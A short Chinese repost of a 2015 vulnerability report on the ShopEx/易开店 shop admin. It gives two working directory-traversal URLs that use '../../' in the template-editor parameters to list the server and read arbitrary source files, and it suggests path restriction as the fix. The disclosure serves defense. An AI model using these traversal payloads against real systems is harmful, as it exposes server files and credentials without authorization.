网站地图    收藏   

主页 > 后端 > 网站安全 >

shopEx易开店系统遍历文件漏洞及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 易开店演示站存在遍历文件漏洞,可以读取到任意文件源码。sn详细说明:首先登陆易开店演示站后台:http://demo.ekaidian.cn/shopadmin/index.php?ctl=passportact=login输入官方提供的试用账户,进入...

易开店演示站存在遍历文件漏洞,可以读取到任意文件源码。sn
详细说明:首先登陆易开店演示站后台:http://demo.ekaidian.cn/shopadmin/index.php?ctl=passport&act=login
输入官方提供的试用账户,进入页面管理,模板编辑菜单
构造如下url:http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/tmpimage&act=index&theme=../../&istheme=1
其中../../可以任意构造,即可遍历整个服务器
然后通过遍历得知的路径和文件名 即可读取任意文件

例如 http://demo.ekaidian.cn/shopadmin/index.php#ctl=system/template&act=editor&p[0]=../../&p[1]=index.php
漏洞证明:



修复方案:增加对路径限制。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论